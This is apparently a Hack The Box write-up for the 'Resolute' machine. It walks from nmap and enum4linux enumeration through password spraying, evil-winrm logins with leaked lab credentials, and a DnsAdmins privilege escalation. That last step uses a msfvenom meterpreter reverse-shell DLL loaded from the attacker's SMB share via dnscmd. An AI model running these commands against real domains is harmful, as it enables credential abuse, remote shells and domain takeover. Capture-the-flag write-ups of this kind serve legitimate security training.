Running enum4linux against the box we got some usernames and a password for user marko . After some hit and try we got succeed to login as melanie using evil-winrm. After some manual enumeration i got a hidden file in a hidden directory. Which contains credentials of the user ryan. After Switching to ryan we came to know that ryan is in the group of dnsadmin. Crafting a malicious dll file and adding the entry of our dll as the server plugin and restarting the service we will able to execute our dll as admin.
Let’s get started
As always hacking starts with NMAP scan.
resolute nmap -sC -sV -p- -v -oA scans/nmap-full -T4 resolute.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 09:31 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating Ping Scan at 09:31
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 09:31, 0.59s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:31
Scanning resolute.htb (10.10.10.169) [65535 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:52
Completed NSE at 09:54, 121.80s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 1.93s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.36s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 04:29:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
64798/tcp open tcpwrapped
64974/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/29%Time=5ED11327%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -7h00m31s, deviation: 4h02m32s, median: -9h20m33s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-28T21:32:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-29 00:32:10
|_ start_date: 2020-05-28 18:33:16
NSE: Script Post-scanning.
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1372.93 seconds
Raw packets sent: 72795 (3.203MB) | Rcvd: 69585 (2.784MB)
Using Enum4linux as the next step:
Enum4linux
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 30 07:44:42 2020
==========================
| Target Information |
==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on resolute.htb |
====================================================
[E] Cant find workgroup/domain
============================================
| Nbtstat Information for resolute.htb |
============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.169
No reply from 10.10.10.169
UserList
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
something useful
=============================
| Users on resolute.htb |
=============================
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko
Name: Marko Novak
Desc: Account created. Password set to Welcome123!
Getting the User
So i used evil-winrm using user marko and pass Welcome123!
Which returned nothing…
So I treid the same password with all the users that I’ve found with the help of crackmapexe….
Which returned this
Username and password melanie:Welcome123!
Again with the help of EVIL-WINRM I was able to login and get the USER.txt….
evil-winrm -u melanie -p Welcome123! -i 10.10.10.169
Diggin in a little bit more deeper and searching for all the hidden files and directories, I found this..
cd /
dir -force
cd PSTranscripts
cd 20191203
cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
This Powershell script will reveal the password of the other user on the domain,
ryan : Serv3r4Admin4cc123!
Immediately jumping into Evil-Winrm and using Ryan credentials, got the shell of Ryan.
evil-winrm -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169
Privlilege Escalation
Exploring the directories of ryan, found note.txt. Which says
“Email to team: - due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute”
Finding out the permissions of Ryan
C:\Users\ryan\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID
========================================== ================ ==============================================
Everyone Well-known group S-1-1-0
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
BUILTIN\Remote Management Users Alias S-1-5-32-580
NT AUTHORITY\NETWORK Well-known group S-1-5-2
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
NT AUTHORITY\This Organization Well-known group S-1-5-15
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
C:\Users\ryan\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID
========================================== ================ ==============================================
Everyone Well-known group S-1-1-0
BUILTIN\Users Alias S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554
BUILTIN\Remote Management Users Alias S-1-5-32-580
NT AUTHORITY\NETWORK Well-known group S-1-5-2
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11
NT AUTHORITY\This Organization Well-known group S-1-5-15
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Seeing that Ryan is a member of DNSAdmins of Megabank.local, we can escalate our privileges from DNS admin to administrator.
This is the link that helped me…
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
Quickly generating a msfpayload and uploading the file.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=tun0 lport=3333 -f dll > plugin.dll
uploading the file using impacket script.
./smbserver.py -smb2support jeevan /home/stuxnet`
start the msfconsole and setup the listener.
> msfconsole
> use multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost tun0
> set lport 3333
> exploit
now the first command is to run the .dll file and the second and third commands are to stop and start the service respectively.
C:\Users\ryan\Desktop> dnscmd.exe /config /serverlevelplugindll \\10.10.14.47\jeevan\plugin.dll
sc.exe stop dns
sc.exe start dns
And we get the shell as administrator
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968